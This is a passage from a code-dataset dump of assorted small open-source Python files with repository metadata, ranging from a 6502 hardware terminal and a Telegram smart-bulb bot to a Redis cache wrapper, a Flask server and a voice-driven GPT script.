self.exit_on_error()\n\n def exit(self):\n \"\"\"Stopps the program\n \"\"\"\n self.stop_event.set()\n if self.serial_thread:\n self.serial_thread.close()\n\n def exit_on_error(self):\n \"\"\"Steps the program (calls self.exit()).\n Additionaly prints \"Press any key to exit...\" and waits on keypress.\n Ensures the error message can be read before the console closes.\n \"\"\"\n self.exit()\n myprint(\"Press any key to exit...\\n\")\n msvcrt.getch()\n\n def select_assembly(self, force_dialog=False):\n \"\"\"Opens the file open dialog to select the assembly or binary file.\n If force_dialog is not set the file defines by the args is used, if exists.\n\n Args:\n 
force_dialog (bool, optional): Defaults to False.\n \"\"\"\n new_file = AssemblyActions.select(self.args, force_dialog)\n if new_file:\n self.assembly_file = new_file\n myprint(\"Selected File: %s\\n\" % self.assembly_file)\n self.read_binary_and_update_disam()\n\n def is_file_binary(self):\n \"\"\"Checks if file is a binary or an assembly file by the file extension.\n\n Returns:\n bool: True if binary file\n \"\"\"\n return os.path.splitext(self.assembly_file)[1] == \".bin\"\n\n def read_binary_and_update_disam(self):\n \"\"\"Reads the corresponding binary file and updates the Disassembler object\n\n Returns:\n bool: True if reading was successful\n \"\"\"\n result = AssemblyActions.read_bin_file(self.assembly_file)\n if result.success:\n self.binary = result.eeprom_content\n\n # EEPROM is second half of memory, starting at 0x8000.\n memory = [0]*(0x10000 - AssemblyActions.EEPROM_SIZE) + self.binary\n self.disasm = dis6502(memory)\n return result.success\n\n def assemble(self, no_warning=False):\n \"\"\"Runs the assembler on the selected file.\n\n Args:\n no_warning (bool, optional): Disable the warning if the selected file is a binary.\n Defaults to False.\n\n Returns:\n bool: True, if assembly was successful\n \"\"\"\n if self.is_file_binary():\n if not no_warning:\n myprint_warning(\"Selected file is a binary.\\n\")\n return True\n success = AssemblyActions.assemble(self.assembly_file)\n\n if success:\n self.read_binary_and_update_disam()\n return success\n\n def program(self):\n \"\"\"Programs the EEPROM\n \"\"\"\n if self.is_file_binary():\n self.read_binary_and_update_disam()\n\n self.auto_single_step = False\n AssemblyActions.flash(self.args, self.binary, self.serial_thread)\n\n def reset(self, force_autoreset=False):\n \"\"\"Resets the 6502 processor.\n Either a simple reset (setting the pin) or a full reset (stepping until first opcode fetch)\n is performed, depending on force_autoreset and the args setting.\n\n Args:\n force_autoreset (bool, optional): Defaults to False.\n \"\"\"\n if not self.args.simplereset or force_autoreset:\n self.auto_single_step = False\n BusActions.send_api_auto_reset(self.serial_thread)\n else:\n BusActions.send_api_reset(self.serial_thread)\n\n def single_step(self):\n \"\"\"Single steps the 6502 processor.\n Request is sent.\n Arduino automatically answers with bus update.\n \"\"\"\n self.auto_single_step = False\n BusActions.send_api_single_step(self.serial_thread)\n\n def assemble_program_reset(self):\n \"\"\"Automatically assembles, programs and resets 6502\n \"\"\"\n self.auto_single_step = False\n success = self.assemble(no_warning=True)\n if not success:\n return\n self.program()\n self.reset(force_autoreset=True)\n\n def auto_single_step_toggle(self):\n \"\"\"Toggles autostepping\n \"\"\"\n self.auto_single_step = not self.auto_single_step\n\n def on_key_pressed(self, key):\n \"\"\"On key pressed.\n Using a keymap to execute the methods above\n\n Args:\n key (int): Keycode\n \"\"\"\n keymap = {\n \"h\": HelpActions.print_help,\n \"q\": self.stop_event.set,\n\n \"o\": lambda: self.select_assembly(True),\n \"a\": self.assemble,\n \"p\": self.program,\n\n \"r\": self.reset,\n \"u\": self.assemble_program_reset,\n\n \"s\": self.single_step,\n \"t\": self.auto_single_step_toggle\n }\n\n if chr(key) in keymap:\n keymap[chr(key)]()\n\n\nif __name__ == \"__main__\":\n Main().run()\n", "repo_name": "RobFro96/Arduino-Mega-6502", "sub_path": "term-6502/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 8041, "program_lang": "python", 
"lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "msvcrt.kbhit", "line_number": 34, "usage_type": "call"}, {"api_name": "msvcrt.getch", "line_number": 34, "usage_type": "call"}, {"api_name": "coloredlogs.install", "line_number": 39, "usage_type": "call"}, {"api_name": "help_actions.HelpActions.get_args", "line_number": 50, "usage_type": "call"}, {"api_name": "help_actions.HelpActions", "line_number": 50, "usage_type": "name"}, {"api_name": "serial_thread.SerialThread", "line_number": 52, "usage_type": "name"}, {"api_name": "py6502.dis6502.dis6502", "line_number": 55, "usage_type": "name"}, {"api_name": "threading.Event", "line_number": 56, "usage_type": "call"}, {"api_name": "serial_actions.SerialActions.port_select", "line_number": 64, "usage_type": "call"}, {"api_name": "serial_actions.SerialActions", "line_number": 64, "usage_type": "name"}, {"api_name": "serial_actions.SerialActions.connecting", "line_number": 70, "usage_type": "call"}, {"api_name": "serial_actions.SerialActions", "line_number": 70, "usage_type": "name"}, {"api_name": "serial_thread.SerialThread", "line_number": 74, "usage_type": "name"}, {"api_name": "help_actions.HelpActions.print_help", "line_number": 83, "usage_type": "call"}, {"api_name": "help_actions.HelpActions", "line_number": 83, "usage_type": "name"}, {"api_name": "bus_actions.BusActions.update", "line_number": 95, "usage_type": "call"}, {"api_name": "bus_actions.BusActions", "line_number": 95, "usage_type": "name"}, {"api_name": "time.time", "line_number": 98, "usage_type": "call"}, {"api_name": "bus_actions.BusActions.send_api_single_step", "line_number": 99, "usage_type": "call"}, {"api_name": "bus_actions.BusActions", "line_number": 99, "usage_type": "name"}, {"api_name": "time.time", "line_number": 100, "usage_type": "call"}, {"api_name": "myprint.myprint", "line_number": 124, "usage_type": "call"}, {"api_name": "msvcrt.getch", "line_number": 125, "usage_type": "call"}, {"api_name": "assembly_actions.AssemblyActions.select", "line_number": 134, "usage_type": "call"}, {"api_name": "assembly_actions.AssemblyActions", "line_number": 134, "usage_type": "name"}, {"api_name": "myprint.myprint", "line_number": 137, "usage_type": "call"}, {"api_name": "os.path.splitext", "line_number": 146, "usage_type": "call"}, {"api_name": "os.path", "line_number": 146, "usage_type": "attribute"}, {"api_name": "assembly_actions.AssemblyActions.read_bin_file", "line_number": 154, "usage_type": "call"}, {"api_name": "assembly_actions.AssemblyActions", "line_number": 154, "usage_type": "name"}, {"api_name": "assembly_actions.AssemblyActions.EEPROM_SIZE", "line_number": 159, "usage_type": "attribute"}, {"api_name": "assembly_actions.AssemblyActions", "line_number": 159, "usage_type": "name"}, {"api_name": "py6502.dis6502.dis6502", "line_number": 160, "usage_type": "call"}, {"api_name": "myprint.myprint_warning", "line_number": 175, "usage_type": "call"}, {"api_name": "assembly_actions.AssemblyActions.assemble", "line_number": 177, "usage_type": "call"}, {"api_name": "assembly_actions.AssemblyActions", "line_number": 177, "usage_type": "name"}, {"api_name": "assembly_actions.AssemblyActions.flash", "line_number": 190, "usage_type": "call"}, {"api_name": "assembly_actions.AssemblyActions", "line_number": 190, "usage_type": "name"}, {"api_name": "bus_actions.BusActions.send_api_auto_reset", "line_number": 203, "usage_type": "call"}, {"api_name": "bus_actions.BusActions", "line_number": 203, "usage_type": "name"}, {"api_name": 
"bus_actions.BusActions.send_api_reset", "line_number": 205, "usage_type": "call"}, {"api_name": "bus_actions.BusActions", "line_number": 205, "usage_type": "name"}, {"api_name": "bus_actions.BusActions.send_api_single_step", "line_number": 213, "usage_type": "call"}, {"api_name": "bus_actions.BusActions", "line_number": 213, "usage_type": "name"}, {"api_name": "help_actions.HelpActions.print_help", "line_number": 238, "usage_type": "attribute"}, {"api_name": "help_actions.HelpActions", "line_number": 238, "usage_type": "name"}]} +{"seq_id": "519276115", "text": "from aiogram.dispatcher.filters import Command, Text\nfrom aiogram.types import Message\n\nfrom keyboards.default.menu import bulbs_menu, bulb_menu\nfrom keyboards.default.menu import menu\nfrom loader import dp\nfrom utils.devices.smart_bulbs import SmartBulbs\n\nbulb = SmartBulbs()\n\n\n@dp.message_handler(Command(\"menu\"))\nasync def show_menu(message: Message):\n await message.answer('Выберете умную технику', reply_markup=menu)\n\n\n@dp.message_handler(Text(equals='Умные лампы'))\nasync def show_bulbs_menu(message: Message):\n print(bulb.bulbs)\n await message.answer('Выберете умную лампу', reply_markup=bulbs_menu)\n\n\n@dp.message_handler(Text(equals='1'))\nasync def show_bulb_menu(message: Message):\n bulb.bulb_number = int(message.text) - 1\n await message.answer('Выберете настройку для лампы', reply_markup=bulb_menu)\n\n\n@dp.message_handler(Text(equals=['Включить']))\nasync def turn_on_lump(message: Message):\n bulb.turn_on()\n await dp.bot.send_message(message.from_user.id, \"Лампа включена\")\n\n\n@dp.message_handler(text=['Выключить'])\nasync def turn_off_lump(message: Message):\n bulb.turn_off()\n await dp.bot.send_message(message.from_user.id, \"Лампа выключена\")\n", "repo_name": "insigmo/smart_home_tg", "sub_path": "handlers/users/menu.py", "file_name": "menu.py", "file_ext": "py", "file_size_in_byte": 1299, "program_lang": "python", "lang": "ru", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "utils.devices.smart_bulbs.SmartBulbs", "line_number": 9, "usage_type": "call"}, {"api_name": "aiogram.types.Message", "line_number": 13, "usage_type": "name"}, {"api_name": "keyboards.default.menu.menu", "line_number": 14, "usage_type": "name"}, {"api_name": "loader.dp.message_handler", "line_number": 12, "usage_type": "call"}, {"api_name": "loader.dp", "line_number": 12, "usage_type": "name"}, {"api_name": "aiogram.dispatcher.filters.Command", "line_number": 12, "usage_type": "call"}, {"api_name": "aiogram.types.Message", "line_number": 18, "usage_type": "name"}, {"api_name": "keyboards.default.menu.bulbs_menu", "line_number": 20, "usage_type": "name"}, {"api_name": "loader.dp.message_handler", "line_number": 17, "usage_type": "call"}, {"api_name": "loader.dp", "line_number": 17, "usage_type": "name"}, {"api_name": "aiogram.dispatcher.filters.Text", "line_number": 17, "usage_type": "call"}, {"api_name": "aiogram.types.Message", "line_number": 24, "usage_type": "name"}, {"api_name": "keyboards.default.menu.bulb_menu", "line_number": 26, "usage_type": "name"}, {"api_name": "loader.dp.message_handler", "line_number": 23, "usage_type": "call"}, {"api_name": "loader.dp", "line_number": 23, "usage_type": "name"}, {"api_name": "aiogram.dispatcher.filters.Text", "line_number": 23, "usage_type": "call"}, {"api_name": "aiogram.types.Message", "line_number": 30, "usage_type": "name"}, {"api_name": "loader.dp.bot.send_message", "line_number": 32, "usage_type": "call"}, {"api_name": 
"loader.dp.bot", "line_number": 32, "usage_type": "attribute"}, {"api_name": "loader.dp", "line_number": 32, "usage_type": "name"}, {"api_name": "loader.dp.message_handler", "line_number": 29, "usage_type": "call"}, {"api_name": "loader.dp", "line_number": 29, "usage_type": "name"}, {"api_name": "aiogram.dispatcher.filters.Text", "line_number": 29, "usage_type": "call"}, {"api_name": "aiogram.types.Message", "line_number": 36, "usage_type": "name"}, {"api_name": "loader.dp.bot.send_message", "line_number": 38, "usage_type": "call"}, {"api_name": "loader.dp.bot", "line_number": 38, "usage_type": "attribute"}, {"api_name": "loader.dp", "line_number": 38, "usage_type": "name"}, {"api_name": "loader.dp.message_handler", "line_number": 35, "usage_type": "call"}, {"api_name": "loader.dp", "line_number": 35, "usage_type": "name"}]} +{"seq_id": "12018439866", "text": "#!/usr/bin/env python\n#\n# Design Kei Sawamura\n# Author Kei Sawamura\n#\n# This application allows you to call GPT with voice.\n#\n\nimport openai\nimport os\nimport speech_recognition as sr\n\nfrom gtts import gTTS\nfrom playsound import playsound\n\n\ndef listen_to_order():\n\n # Create a recognizer instance.\n r = sr.Recognizer()\n \n # Continuously listen for order.\n with sr.Microphone() as source:\n print(\"Listening...\")\n audio = r.listen(source)\n\n try:\n # Use Google's speech recognition service to convert speech to text.\n content = r.recognize_google(audio, language='ja-JP')\n print(\"You said: {}\".format(content))\n\n return content\n\n except sr.UnknownValueError:\n # If the speech was unclear, it will throw this error.\n print(\"Sorry, I didn't catch that.\")\n\n except sr.RequestError as e:\n print(\"Could not request results; {0}\".format(e))\n \n\n\ndef call_openai_api(content, model = \"gpt-4\"):\n\n # Load your API key from an environment variable or secret management service.\n openai.api_key = os.getenv(\"OPENAI_API_KEY\")\n response = openai.ChatCompletion.create(model = model,\n messages = [\n { \"role\": \"user\", \"content\": \"次の日本語の質問を英語で回答してください\" },\n { \"role\": \"assistant\", \"content\": \"OK, How can I help you?\" },\n { \"role\": \"user\", \"content\": content }\n ]\n )\n\n return response\n\n\n\ndef save_and_speach(context):\n\n res = call_openai_api(content)\n\n msg = res.choices[0].message['content']\n mp3 = res.id + \".mp3\"\n txt = res.id + \".txt\"\n\n print(msg)\n\n os.mkdir(content)\n tts = gTTS(msg, lang='en')\n tts.save(content + os.sep + mp3)\n playsound(content + os.sep + mp3)\n\n with open(content + os.sep + txt, \"w\") as file:\n file.write(msg)\n\n\n\nif __name__ == '__main__':\n\n content = listen_to_order()\n ans = input(\"Do you call GPT-API? 
[y/n]: \")\n\n if (ans == \"y\"):\n save_and_speach(content)\n \n\n", "repo_name": "keix/call-gpt-with-voice", "sub_path": "call-gpt-with-voice.py", "file_name": "call-gpt-with-voice.py", "file_ext": "py", "file_size_in_byte": 2084, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "speech_recognition.Recognizer", "line_number": 20, "usage_type": "call"}, {"api_name": "speech_recognition.Microphone", "line_number": 23, "usage_type": "call"}, {"api_name": "speech_recognition.UnknownValueError", "line_number": 34, "usage_type": "attribute"}, {"api_name": "speech_recognition.RequestError", "line_number": 38, "usage_type": "attribute"}, {"api_name": "openai.api_key", "line_number": 46, "usage_type": "attribute"}, {"api_name": "os.getenv", "line_number": 46, "usage_type": "call"}, {"api_name": "openai.ChatCompletion.create", "line_number": 47, "usage_type": "call"}, {"api_name": "openai.ChatCompletion", "line_number": 47, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 69, "usage_type": "call"}, {"api_name": "gtts.gTTS", "line_number": 70, "usage_type": "call"}, {"api_name": "os.sep", "line_number": 71, "usage_type": "attribute"}, {"api_name": "playsound.playsound", "line_number": 72, "usage_type": "call"}, {"api_name": "os.sep", "line_number": 72, "usage_type": "attribute"}, {"api_name": "os.sep", "line_number": 74, "usage_type": "attribute"}]} +{"seq_id": "18272251307", "text": "from glob import glob\nfrom obspy import read_inventory\n\ndef mkdir(dirname):\n if not os.path.exists(dirname):\n os.makedirs(dirname)\n\ndef get_stainfo(xmlfile):\n mkdir(\"./response_figure\")\n inv = read_inventory(xmlfile)\n net = inv[0]\n sta = net[0]\n lat = sta.latitude\n lon = sta.longitude\n net_name = xmlfile.split(\".\")[0]\n sta_name = xmlfile.split(\".\")[1]\n if \"Z\" in sta[0].code:\n cha = sta[0]\n elif \"Z\" in sta[1].code:\n cha = sta[1]\n else:\n cha = sta[2]\n cha_name = cha.code\n response = cha.response\n response_figure = \"./response_figure/\"+net_name+\".\"+sta_name+\".\"+cha_name+\".png\"\n response.plot(min_freq=0.001, output=\"VEL\", outfile=response_figure)\n\nxmlfile_list = glob(\"*.xml\")\nfor xmlfile in xmlfile_list:\n get_stainfo(xmlfile)\n", "repo_name": "ranoriginals/Seismic-Attenuation-in-Alaska", "sub_path": "2_station/instrument_response/plot_response.py", "file_name": "plot_response.py", "file_ext": "py", "file_size_in_byte": 811, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "obspy.read_inventory", "line_number": 10, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 28, "usage_type": "call"}]} +{"seq_id": "189772634", "text": "\"\"\"add login_attemps and locked_at field to user table\n\nRevision ID: 188374910655\nRevises: f30cf048c228\nCreate Date: 2022-08-12 19:05:59.776361\n\n\"\"\"\nimport sqlalchemy as sa\n\nfrom alembic import op\n\n# revision identifiers, used by Alembic.\nrevision = \"188374910655\"\ndown_revision = \"f30cf048c228\"\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n op.add_column(\"users\", sa.Column(\"login_attemps\", sa.Integer(), nullable=True))\n op.add_column(\"users\", sa.Column(\"locked_at\", sa.DateTime(), nullable=True))\n\n\ndef downgrade():\n op.drop_column(\"users\", \"locked_at\")\n op.drop_column(\"users\", \"login_attemps\")\n", "repo_name": "mealie-recipes/mealie", "sub_path": 
"alembic/versions/2022-08-12-19.05.59_188374910655_add_login_attemps_and_locked_at_field_.py", "file_name": "2022-08-12-19.05.59_188374910655_add_login_attemps_and_locked_at_field_.py", "file_ext": "py", "file_size_in_byte": 622, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3977, "dataset": "github-code", "pt": "52", "api": [{"api_name": "alembic.op.add_column", "line_number": 20, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 20, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 20, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 20, "usage_type": "call"}, {"api_name": "alembic.op.add_column", "line_number": 21, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 21, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 21, "usage_type": "call"}, {"api_name": "sqlalchemy.DateTime", "line_number": 21, "usage_type": "call"}, {"api_name": "alembic.op.drop_column", "line_number": 25, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 25, "usage_type": "name"}, {"api_name": "alembic.op.drop_column", "line_number": 26, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 26, "usage_type": "name"}]} +{"seq_id": "32367329445", "text": "from enum import Enum\n\n\nclass Small(Enum):\n one = 1\n two = 2\n three = 3\n four = 4\n\n\nAssertionOperator = Enum(\n \"AssertionOperator\",\n {\n \"equal\": \"==\",\n \"==\": \"==\",\n \"should be\": \"==\",\n \"inequal\": \"!=\",\n \"!=\": \"!=\",\n \"should not be\": \"!=\",\n \"less than\": \"<\",\n \"<\": \"<\",\n \"greater than\": \">\",\n \">\": \">\",\n \"<=\": \"<=\",\n \">=\": \">=\",\n \"contains\": \"*=\",\n \"*=\": \"*=\",\n \"starts\": \"^=\",\n \"^=\": \"^=\",\n \"should start with\": \"^=\",\n \"ends\": \"$=\",\n \"should end with\": \"$=\",\n \"$=\": \"$=\",\n \"matches\": \"$\",\n \"validate\": \"validate\",\n \"then\": \"then\",\n \"evaluate\": \"then\",\n },\n)\nAssertionOperator.__doc__ = \"\"\"This is some Doc\"\"\"\n\n\nclass TOCWithInitsAndKeywordsAndDataTypes:\n \"\"\"\n = First entry =\n\n TOC in somewhat strange place.\n\n %TOC%\n\n = Second =\n\n = 3 =\n\n %TOC% not replaced here\n \"\"\"\n\n def __init__(self, arg=True, enum: Small = Small.three):\n pass\n\n def keyword(self, assertion: AssertionOperator = AssertionOperator.equal, small: Small = Small.one):\n \"\"\"Tags: tag\"\"\"\n pass\n", "repo_name": "robocopcoin/RobotEC-Framework", "sub_path": "atest/testdata/libdoc/TOCWithInitsAndKeywordsAndDataTypes.py", "file_name": "TOCWithInitsAndKeywordsAndDataTypes.py", "file_ext": "py", "file_size_in_byte": 1213, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "enum.Enum", "line_number": 4, "usage_type": "name"}, {"api_name": "enum.Enum", "line_number": 11, "usage_type": "call"}]} +{"seq_id": "74447858403", "text": "from typing import List\n\n\nclass Railway:\n def __init__(self):\n pass\n\n def railway(self, landmarks: int, distance: List[List[int]]) -> int:\n\n distance.sort(key=lambda a: a[2]) # sort all edges by weight\n parent = [i for i in range(landmarks + 1)] # initially, all vertices's parent is themselves\n\n def find(x):\n # if x == parent[x]:\n # return parent[x]\n # return find(parent[parent[x]])\n if x != parent[x]:\n parent[x] = find(parent[parent[x]])\n return parent[x]\n\n sum_distance, e, k = 0, 0, 0\n while e < landmarks - 1: # number of MST's edges = V-1\n u, v, d = distance[k] # 
d:weight(distance)\n\n k += 1\n x = find(u - 1)\n y = find(v - 1)\n\n if x != y:\n e += 1\n sum_distance += d\n parent[x] = y\n\n return sum_distance\n", "repo_name": "chu-wen-lin/Practical-Data-Structures-Algorithms", "sub_path": "Railway/Railway.py", "file_name": "Railway.py", "file_ext": "py", "file_size_in_byte": 945, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "typing.List", "line_number": 8, "usage_type": "name"}]} +{"seq_id": "14715608626", "text": "import requests\nimport json\nimport pandas as pd\nfrom scipy.stats import f_oneway\n\n# Mengunduh data dari URL\nurl = \"https://raw.githubusercontent.com/rebekz/datascience_course/main/data/driver_income.json\"\nresponse = requests.get(url)\n\n# Memeriksa apakah permintaan berhasil\nif response.status_code == 200:\n # Membaca data JSON dari respons\n data = json.loads(response.text)\n\n # Membuat DataFrame dari data\n df = pd.DataFrame(data)\n print(df)\n\n # Melakukan uji ANOVA\n grouped_data = [df[df['ownership'] == 'own']['income'],\n df[df['ownership'] == 'rent']['income'],\n df[df['ownership'] == 'other']['income']]\n\n print(grouped_data)\n # Melakukan uji ANOVA\n f_statistic, p_value = f_oneway(*grouped_data)\n\n # Menampilkan hasil uji statistik\n print(\"Hasil Uji ANOVA:\")\n print(\"Nilai F-statistic:\", f_statistic)\n print(\"Nilai p-value:\", p_value)\n\n # Menginterpretasikan hasil uji ANOVA\n alpha = 0.05\n if p_value < alpha:\n print(\"Ada perbedaan signifikan dalam pendapatan antara kelompok ownership.\")\n else:\n print(\"Tidak ada perbedaan signifikan dalam pendapatan antara kelompok ownership.\")\n\nelse:\n print(\"Gagal mengunduh data. Kode status:\", response.status_code)\n", "repo_name": "Hakim223/Submission-Final-Exam-Data-Science", "sub_path": "uji.py", "file_name": "uji.py", "file_ext": "py", "file_size_in_byte": 1269, "program_lang": "python", "lang": "id", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "requests.get", "line_number": 8, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 13, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 16, "usage_type": "call"}, {"api_name": "scipy.stats.f_oneway", "line_number": 26, "usage_type": "call"}]} +{"seq_id": "49085635", "text": "from drf_spectacular.utils import extend_schema\nfrom rest_framework import viewsets\nfrom rest_framework.exceptions import NotAuthenticated, PermissionDenied\nfrom rest_framework.permissions import IsAuthenticated\n\nfrom server.apps.blog.models import Post\nfrom server.apps.blog.serializers import PostSerializer\nfrom server.apps.common.helpers_exception import exception_schema_dict\n\n\nclass PostViewSet(viewsets.ReadOnlyModelViewSet):\n serializer_class = PostSerializer\n authentication_classes = ()\n permission_classes = ()\n\n def get_queryset(self):\n return Post.objects.all()\n\n @extend_schema(\n responses={\n 200: PostSerializer,\n 401: exception_schema_dict(\n (\n NotAuthenticated,\n ),\n ),\n 403: exception_schema_dict(\n (\n PermissionDenied,\n ),\n ),\n },\n )\n def list(self, request, *args, **kwargs):\n return super().list(request, *args, **kwargs)\n", "repo_name": "Praglu/dietitian-application-server", "sub_path": "src/server/apps/blog/views/post.py", "file_name": "post.py", "file_ext": "py", "file_size_in_byte": 1045, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": 
"rest_framework.viewsets.ReadOnlyModelViewSet", "line_number": 11, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 11, "usage_type": "name"}, {"api_name": "server.apps.blog.serializers.PostSerializer", "line_number": 12, "usage_type": "name"}, {"api_name": "server.apps.blog.models.Post.objects.all", "line_number": 17, "usage_type": "call"}, {"api_name": "server.apps.blog.models.Post.objects", "line_number": 17, "usage_type": "attribute"}, {"api_name": "server.apps.blog.models.Post", "line_number": 17, "usage_type": "name"}, {"api_name": "drf_spectacular.utils.extend_schema", "line_number": 19, "usage_type": "call"}, {"api_name": "server.apps.blog.serializers.PostSerializer", "line_number": 21, "usage_type": "name"}, {"api_name": "server.apps.common.helpers_exception.exception_schema_dict", "line_number": 22, "usage_type": "call"}, {"api_name": "rest_framework.exceptions.NotAuthenticated", "line_number": 24, "usage_type": "name"}, {"api_name": "server.apps.common.helpers_exception.exception_schema_dict", "line_number": 27, "usage_type": "call"}, {"api_name": "rest_framework.exceptions.PermissionDenied", "line_number": 29, "usage_type": "name"}]} +{"seq_id": "12503204764", "text": "# coding=utf-8\n\nimport redis\nimport zlib\nimport pickle\n\n\nclass RedisCache(object):\n def __init__(self, params={}):\n default_timeout = 3600 * 24 * 100\n host = params.get('HOST', '127.0.0.1')\n port = params.get('PORT', 6379)\n db = params.get('DB', 0)\n timeout = params.get('timeout', params.get('TIMEOUT', default_timeout))\n if timeout is not None:\n try:\n timeout = int(timeout)\n except (ValueError, TypeError):\n timeout = 300\n self.default_timeout = timeout\n\n self._cache = redis.StrictRedis(host=host, port=port, db=db)\n self._headers = {'zlib': '!zlib!', 'pickle': '!pickle!'}\n\n def _prepare_key(self, raw_key):\n return str(raw_key)\n # return smart_str(raw_key)\n\n def _check_header(self, header, value):\n header_marker = self._headers.get(header)\n if header_marker and \\\n isinstance(value, str) and \\\n value[:len(header_marker)] == header_marker:\n value = value[len(header_marker):]\n if header == 'zlib':\n value = zlib.decompress(value)\n if header == 'pickle':\n value = pickle.loads(value)\n return value\n\n def _pack_value(self, value):\n if isinstance(value, str):\n pass\n elif isinstance(value, int) or isinstance(value, float):\n value = str(value)\n else:\n value = self._headers['pickle'] + pickle.dumps(value)\n # zlib.compress if value is long enough\n if len(value) > 1000:\n value = self._headers['zlib'] + zlib.compress(value)\n return value\n\n def _unpack_value(self, value):\n value = self._check_header('zlib', value)\n value = self._check_header('pickle', value)\n return value\n\n def add(self, key, value, timeout=0):\n if self._cache.exists(key):\n return False\n return self.set(key, value, timeout or self.default_timeout)\n\n def set(self, key, value, timeout=None):\n key = self._prepare_key(key)\n\n # store the key/value pair\n result = self._cache.set(key, self._pack_value(value))\n\n # set content expiration, if necessary\n self._cache.expire(key, timeout or self.default_timeout)\n\n return result\n\n def get(self, key, default=None):\n key = self._prepare_key(key)\n value = self._cache.get(key)\n\n if value is None:\n return default\n else:\n return self._unpack_value(value)\n\n def incr(self, key, amount):\n return self._cache.incr(key, amount)\n\n def decr(self, key, amount):\n return self._cache.decr(key, amount)\n\n def delete(self, 
key):\n key = self._prepare_key(key)\n self._cache.delete(key)\n\n def expire(self, key, time):\n self._cache.expire(key, time)\n\n def flush(self, all_dbs=False):\n self._cache.flush(all_dbs)\n\n def close(self, **kwargs):\n pass\n", "repo_name": "NoharaHiroshi/forum_system", "sub_path": "redis_store/redis_cahce.py", "file_name": "redis_cahce.py", "file_ext": "py", "file_size_in_byte": 3005, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "redis.StrictRedis", "line_number": 22, "usage_type": "call"}, {"api_name": "zlib.decompress", "line_number": 36, "usage_type": "call"}, {"api_name": "pickle.loads", "line_number": 38, "usage_type": "call"}, {"api_name": "pickle.dumps", "line_number": 47, "usage_type": "call"}, {"api_name": "zlib.compress", "line_number": 50, "usage_type": "call"}]} +{"seq_id": "24434772309", "text": "from flask import Flask, request, render_template, send_from_directory\nfrom time import time, strftime\nfrom datetime import timedelta\n\nfrom json import load as loadJSON\n\nfrom math import ceil\n\napp = Flask(__name__)\n\n\n@app.route('/')\ndef main():\n with open('database.json', 'r') as f:\n db = loadJSON(f)\n start = request.args.get(\n 'after',\n default=0,\n type=int\n )\n perpage = request.args.get(\n 'perpage',\n default=8,\n type=int\n )\n end = min([\n start + perpage - 1,\n len(db['items'])\n ])\n litems = db['items'] if perpage < 1 else db['items'][start:end + 1]\n pid = request.args.get('project', type=int)\n if pid is not None:\n litems = filter(lambda item: item['parent-project'] == pid, litems)\n return render_template(\n \"infoIndex.html\",\n currTime=lambda: strftime(\"%c\"),\n litems=litems,\n pagination=None if perpage < 1 else {\n 'page': round(start / perpage) + 1,\n 'totalPages': max(1, ceil(len(db['items']) / perpage)),\n 'perpage': perpage,\n 'first_page_url': '/?after=%i&perpage=%i' % (0, perpage),\n 'last_page_url': '/?after=%i&perpage=%i' % (len(db['items']) - len(db['items']) % perpage, perpage),\n 'prev_page_url': '/?after=%i&perpage=%i' % (max(0, start - perpage), perpage),\n 'next_page_url': '/?after=%i&perpage=%i' % (end + 1 if end + 1 < len(db['items']) else start, perpage)\n },\n timedelta2readable=lambda seconds: str(timedelta(seconds=seconds))\n )\n\n\n@app.route('/css/')\ndef send_css(path):\n return send_from_directory('css', path)\n\n\n@app.route('/js/')\ndef send_js(path):\n return send_from_directory('js', path)\n\n\nif __name__ == '__main__':\n app.run(host=\"0.0.0.0\", port=8080)\n", "repo_name": "ochen1/TodoistPaper", "sub_path": "infoServer.py", "file_name": "infoServer.py", "file_ext": "py", "file_size_in_byte": 1975, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "flask.Flask", "line_number": 9, "usage_type": "call"}, {"api_name": "json.load", "line_number": 15, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 16, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 16, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 16, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 21, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 21, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 21, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 31, "usage_type": "call"}, {"api_name": "flask.request.args", 
